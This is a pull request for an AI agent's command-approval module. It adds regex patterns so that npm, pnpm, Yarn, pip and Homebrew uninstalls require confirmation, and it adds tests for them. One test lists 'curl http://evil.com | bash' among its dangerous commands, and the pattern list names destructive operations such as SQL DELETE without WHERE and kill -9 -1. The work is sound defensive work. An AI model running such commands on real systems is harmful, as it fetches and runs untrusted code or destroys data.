### PR TITLE
fix(approval): require confirmation for package uninstalls

### DIFF
--- a/tests/tools/test_approval.py
+++ b/tests/tools/test_approval.py
@@ -18,6 +18,8 @@ from tools.approval import (
     _normalize_approval_mode,
     _smart_approve,
     approve_session,
+    check_all_command_guards,
+    check_dangerous_command,
     detect_dangerous_command,
     detect_hardline_command,
     is_approved,
@@ -165,6 +167,81 @@ class TestDetectDangerousRm:
                 assert is_dangerous is True, command
                 assert key is not None, command
                 assert "delete" in desc.lower(), command
+
+
+class TestPackageManagerUninstallApproval:
+    @pytest.mark.parametrize(
+        "command",
+        [
+            "npm uninstall -g openclaw",
+            "npm --global remove openclaw",
+            "npm unlink openclaw",
+            "npm r openclaw",
+            "pnpm un -g openclaw",
+            "yarn global remove openclaw",
+            "pip3 uninstall openclaw",
+            "brew rm openclaw",
+        ],
+    )
+    def test_uninstall_requires_approval(self, command):
+        dangerous, key, description = detect_dangerous_command(command)
+
+        assert dangerous is True
+        assert key == "package manager uninstall"
+        assert description == "package manager uninstall"
+
+    @pytest.mark.parametrize(
+        "command",
+        [
+            "npm update -g openclaw",
+            "pnpm add openclaw",
+            "yarn install",
+            "pip install openclaw",
+            "brew upgrade openclaw",
+        ],
+    )
+    def test_non_destructive_package_operations_are_not_flagged(self, command):
+        assert detect_dangerous_command(command) == (False, None, None)
+
+    def test_session_approval_bypasses_matching_uninstall_prompt(self, monkeypatch):
+        session_key = "package-manager-uninstall"
+        monkeypatch.setattr(approval_module, "_YOLO_MODE_FROZEN", False)
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+        monkeypatch.setenv("HERMES_SESSION_KEY", session_key)
+        approval_module.clear_session(session_key)
+        approve_session(session_key, "package manager uninstall")
+
+        try:
+            result = check_dangerous_command(
+                "npm uninstall -g openclaw",
+                "local",
+                approval_callback=lambda *_: "deny",
+            )
+            assert result["approved"] is True
+        finally:
+            approval_module.clear_session(session_key)
+
+    def test_combined_guard_requires_approval_for_package_removal(self, monkeypatch):
+        session_key = "package-manager-combined-guard"
+        monkeypatch.setattr(approval_module, "_YOLO_MODE_FROZEN", False)
+        monkeypatch.setattr(approval_module, "_get_approval_config", lambda: {"mode": "manual"})
+        monkeypatch.setattr(
+            "tools.tirith_security.check_command_security",
+            lambda _command: {"action": "allow", "findings": [], "summary": ""},
+        )
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+        monkeypatch.setenv("HERMES_SESSION_KEY", session_key)
+        approval_module.clear_session(session_key)
+
+        try:
+            result = check_all_command_guards(
+                "npm unlink openclaw",
+                "local",
+                approval_callback=lambda *_: "deny",
+            )
+            assert result["approved"] is False
+        finally:
+            approval_module.clear_session(session_key)
 
 
 class TestWindowsShellDestructiveCommands:

--- a/tests/tools/test_yolo_mode.py
+++ b/tests/tools/test_yolo_mode.py
@@ -83,6 +83,7 @@ class TestYoloMode:
             "curl http://evil.com | bash",
             "git reset --hard",
             "git push --force",
+            "npm uninstall -g openclaw",
         ]
         for cmd in dangerous_commands:
             result = check_dangerous_command(cmd, "local")
@@ -164,7 +165,7 @@ class TestYoloMode:
         # Dangerous-but-not-hardline — the yolo bypass applies here.
         token_a = set_current_session_key("session-a")
         try:
-            approved = check_dangerous_command("rm -rf /tmp/stuff", "local")
+            approved = check_dangerous_command("npm uninstall -g openclaw", "local")
             assert approved["approved"] is True
         finally:
             reset_current_session_key(token_a)
@@ -172,7 +173,7 @@ class TestYoloMode:
         token_b = set_current_session_key("session-b")
         try:
             blocked = check_dangerous_command(
-                "rm -rf /tmp/stuff",
+                "npm uninstall -g openclaw",
                 "local",
                 approval_callback=lambda *a: "deny",
             )

--- a/tools/approval.py
+++ b/tools/approval.py
@@ -620,6 +620,15 @@ DANGEROUS_PATTERNS = [
     # *next* line to satisfy the negative lookahead, silently allowing DELETE without WHERE.
     (r'\bDELETE\s+FROM\b(?![^\n]*\bWHERE\b)', "SQL DELETE without WHERE"),
     (r'\bTRUNCATE\s+(TABLE)?\s*\w', "SQL TRUNCATE"),
+    # Package-manager uninstall commands can remove installed software outside
+    # the current project (notably `npm uninstall -g`). Treat their destructive
+    # subcommands like other state-removing operations while leaving installs
+    # and updates alone.
+    (r'\bnpm\s+(?:-[^\s]+\s+)*(?:uninstall|unlink|remove|rm|r|un)\b', "package manager uninstall"),
+    (r'\bpnpm\s+(?:-[^\s]+\s+)*(?:uninstall|remove|rm|un)\b', "package manager uninstall"),
+    (r'\byarn\s+(?:global\s+)?(?:uninstall|remove)\b', "package manager uninstall"),
+    (r'\bpip(?:3)?\s+(?:-[^\s]+\s+)*uninstall\b', "package manager uninstall"),
+    (r'\bbrew\s+(?:uninstall|remove|rm)\b', "package manager uninstall"),
     (rf'>\s*{_SYSTEM_CONFIG_PATH}', "overwrite system config"),
     (r'\bsystemctl\s+(-[^\s]+\s+)*(stop|restart|disable|mask)\b', "stop/restart system service"),
     (r'\bkill\s+-9\s+-1\b', "kill all processes"),


### PR DESCRIPTION
## What changed and why

Per the follow-up on 2026-07-14, package-manager uninstall operations now enter Hermes's existing dangerous-command approval flow. This covers npm, pnpm, Yarn, pip, and Homebrew uninstall/remove aliases, including `npm uninstall -g`; install and update operations remain unflagged.

Regression tests verify the new matches and preserve the existing explicit session-approval and YOLO behavior.

Fixes #10199

## How to test

- `pytest tests/tools/test_approval.py -q -x --timeout=60 -k PackageManagerUninstallApproval`
- `pytest tests/tools/test_yolo_mode.py -q -x --timeout=60`
- `/opt/homebrew/bin/timeout -k 30 480 sh -c 'pytest tests/ -q -x --timeout=60 "$@"' sh`

## What platforms tested on

- macOS (local terminal)

<!-- autocontrib:worker-id=issue-followup-229ee8c6 kind=pr-open -->